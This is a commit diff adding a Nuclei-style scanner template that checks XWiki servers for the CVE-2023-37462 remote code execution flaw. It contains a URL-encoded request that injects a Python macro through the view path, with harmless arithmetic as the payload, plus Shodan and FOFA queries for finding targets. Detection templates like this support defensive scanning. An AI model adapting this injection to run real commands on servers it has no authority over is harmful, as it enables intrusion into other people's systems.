Create CVE-2023-37462.yaml
parent
dc1addda06
commit
ae14c1dc03
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2023-37462
|
||||||
|
info:
|
||||||
|
name: XWiki Platform Remote Code Execution
|
||||||
|
author: parthmalhotra, pdresearch
|
||||||
|
severity: critical
|
||||||
|
reference:
|
||||||
|
- https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
|
||||||
|
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg
|
||||||
|
- https://jira.xwiki.org/browse/XWIKI-20457
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"data-xwiki-reference"
|
||||||
|
fofa-query: body="data-xwiki-reference"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wiki/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view"
|
||||||
|
- "{{BaseURL}}/wiki/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
skip-variables-check: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
name: id
|
||||||
|
regex:
|
||||||
|
- data-xwiki-async-client-id="(.+?)"
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
name: url
|
||||||
|
regex:
|
||||||
|
- <span class="xwiki-async" data-xwiki-async-id="(.+?)"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "31557644536232"
|
Loading…
Reference in New Issue